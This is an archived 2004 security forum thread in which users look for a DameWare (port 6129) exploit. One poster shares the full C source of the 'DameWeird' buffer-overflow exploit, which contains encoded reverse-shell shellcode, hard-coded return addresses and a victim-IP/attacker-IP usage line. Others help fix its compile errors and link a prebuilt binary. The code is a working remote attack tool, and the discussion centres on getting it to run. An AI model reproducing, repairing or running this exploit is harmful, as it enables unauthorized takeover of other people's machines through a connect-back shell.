Dameware

Full Version: Dameware

GovernmentSecurity.org > System Security > Beginners Section

ZakOpath

Jul 24 2004, 07:57 AM

Hello.

Somone can tell me why port 6129 scan is getting popular again. ? I think there is a new exploit out there ! are there somone who can tell me if its true ? And if its is where is the exploit ? cant fint it on google

THoRaX

Jul 24 2004, 10:24 AM

as far is i know there ain't a new dameware exploit..
you can find the old one here:
http://www.coromputer.net/index?m=files&s=5&id=14&l=1

or use the search button. they have it in the download sectioopn here compiled

ShouiZen

Jul 24 2004, 02:20 PM

hi, man
This hole is died man!!!! already patched man!!!

Sincerely,
Shouizen

mathofaka

Jul 24 2004, 11:01 PM

wow this is been dead for aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa while

try the WU exploit

prog

Jul 25 2004, 05:59 AM

wu?

ZakOpath

Jul 25 2004, 07:54 AM

Year what do WU stans for ?

But i dont understand why some ppl are requesting 6129 scans again :7

ZoraX

Jul 25 2004, 04:08 PM

maybe there is a private exploit for the latest version? Ask the person that are requesting the scan?

irjenier

Jul 26 2004, 01:37 AM

A BiG Problem..
ive try'd to compile the source and it looks to me very fine..
but it gives me errors and dump one's
take a look:

CODE

Compiler: Default compiler
Executing gcc.exe...
gcc.exe "C:\Documents and Settings\DmX\Local Settings\Temporary Internet Files\Content.IE5\0TW34N0J\DameWeird[1].c" -o "C:\Documents and Settings\DmX\Local Settings\Temporary Internet Files\Content.IE5\0TW34N0J\DameWeird[1].exe" -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib"
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x8e):DameWeird[1].c: undefined reference to `socket@12'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xc7):DameWeird[1].c: undefined reference to `inet_addr@4'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xda):DameWeird[1].c: undefined reference to `htons@4'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xec):DameWeird[1].c: undefined reference to `gethostbyname@4'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x127):DameWeird[1].c: undefined reference to `inet_addr@4'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x172):DameWeird[1].c: undefined reference to `connect@12'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x1da):DameWeird[1].c: undefined reference to `inet_addr@4'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x246):DameWeird[1].c: undefined reference to `htons@4'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x743):DameWeird[1].c: undefined reference to `recv@16'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x79b):DameWeird[1].c: undefined reference to `send@16'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0x7f4):DameWeird[1].c: undefined reference to `recv@16'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xb75):DameWeird[1].c: undefined reference to `send@16'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xba4):DameWeird[1].c: undefined reference to `recv@16'
C:\DOCUME~1\DmX\LOCALS~1\Temp/ccELbaaa.o(.text+0xf85):DameWeird[1].c: undefined reference to `WSAStartup@8'

Execution terminated

now i use dev-cpp 94810 newest and i dont get it.. i mean why it wont compile...
i yry'd borland and it says cant read ws2_32.OBJ means i dont have the godamn thing..
ANOYING!
need help!!!
can some1 put a compiled source here.. ill be greatfull.
tnx

prog

Jul 26 2004, 03:47 AM

Post the source, maybe i can compile it

twistedps

Jul 26 2004, 05:20 AM

QUOTE (ZakOpath @ Jul 25 2004, 07:54 AM)

Year what do WU stans for ?

But i dont understand why some ppl are requesting 6129 scans again :7

wuftpd maybe..

then again people could always try reading advisories and writing their own code, so they dont have to rely on others as much to break into stuff... and dameware is long gone, but a new exploit could always be circulating.

irjenier

Jul 26 2004, 05:37 AM

CODE

#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4
*/

#define RET_XP_VAR0 "\x07\xD5\x36\x77"
#define RET_XP_VAR1 "\xC1\x1C\x35\x77" // these offsets has been reported by many people
#define RET_XP_VAR2 "\xC1\x1C\x39\x77"
#define RET_WIN2k "\xB8\x64\x75\x71"

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

int cnx(char *host)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;

sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}

void set_sc(int os, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
char *port_to_shell="",*ip1="";

ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;

if(os==1) {
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
}
return;
}

int start_auth(int sock, char *rhost, int rport, int var)
{
int size,i=4,os;
char buffer[SIZEOF];
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Operating system : ");
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack : %s\r\n",!buffer[37]?"0":&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,rhost,rport,shellc0de);

memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);
printf("Done\r\n");
if(os==0)
memcpy(&buffer[516],RET_WIN2k,4);
else {
if(var==0) {
printf("[!] Using 0x7736d507 as ret addr\r\n");
memcpy(&buffer[516],RET_XP_VAR0,4);
} else {
if(var==1) {
memcpy(&buffer[516],RET_XP_VAR1,4);
printf("[!] Using 0x77351cc1 as ret addr\r\n");
} else {
memcpy(&buffer[516],RET_XP_VAR2,4);
printf("[!] Using 0x77391cc1 as ret addr\r\n");
}
}
}
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);

printf("[+] Sending evil %-30s ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);

if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}

void banner(void)
{
printf("\r\n [29a] Originaly Coded By JENiER DameWeird v3.0 Universal Exploit [29a] \r\n");
printf("\t\t You Know Where We aT \r\n\r\n");
return;
}
void syntax(char *prog)
{
printf("syntax: %s <Victims-iP> <Your-iP> <Shell-Port> [winXP variant]\r\n",prog);
printf("winXP variante:\r\n");
printf(" 0 will use 0x7736d50c as eip [found on most XPs][default]\r\n");
printf(" 1 will use 0x77351cc1 as eip [found on many XPs]\r\n");
return;
}
int main(int argc, char *argv[])
{
WSADATA wsaData;
int sock,var=0;

banner();
if(argc<4||argc>5) {
syntax(argv[0]);
return -1;
}
if(argc==5) {
var=atoi(argv[4]);
if(var>2||var<0) {
syntax(argv[0]);
return -1;
}
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1]);
if(!sock)
return -1;
start_auth(sock,argv[2],atoi(argv[3]),var);
return 0;
}

HERE IS THE CODE

nuorder

Jul 26 2004, 06:01 AM

did you include ws_32.lib in the linker options

irjenier

Jul 26 2004, 06:05 AM

what do u mean?

nuorder

Jul 26 2004, 06:19 AM

in your compiler you may have to include the winsock library ws_32.lib for defines and functions in the includes to be recognised by the linker when compiling
its generally located in the lib directory of your compiler but isnt always added by default
you just have to find the part of the config in your compiler where you can add this library to the libraries which it will link to when you compile this code
ie: VC++ has project->settings->link

irjenier

Jul 26 2004, 07:21 AM

tnx for ur help but i still have problem to compile it iven when i play in the linker option section
i use dev-cpp and borlan cpp 5.5
and in botland it gives me less errorlike 4 instead of 14
but it also says this..

CODE

Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland
DameWeird.c:
Warning W8004 DameWeird.c 88: 'ip1' is assigned a value that is never used in function set_sc
Warning W8004 DameWeird.c 88: 'port_to_shell' is assigned a value that is never used in function set_sc
Warning W8004 DameWeird.c 208: 'i' is assigned a value that is never used in function start_auth
Warning W8004 DameWeird.c 199: 'size' is assigned a value that is never used in function start_auth
Turbo Incremental Link 5.00 Copyright (c) 1997, 2000 Borland
Fatal: Unable to open file 'WS2_32.OBJ'

prog

Jul 26 2004, 05:08 PM

hxxp://puffpuffgive.net/blah.exe

rename it to whatever you wish
i used VS 6, didnt need to add that lib either

what exact version of DW does this sploit?

G777

Jul 26 2004, 06:24 PM

isnt this the old dameweird exploit

mortello

Jul 26 2004, 07:55 PM

yeah, and it was a good one too....around Xmas....

Gotenks

Jul 27 2004, 11:38 AM

Thnx for the share prog!

Ciao!

Got

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.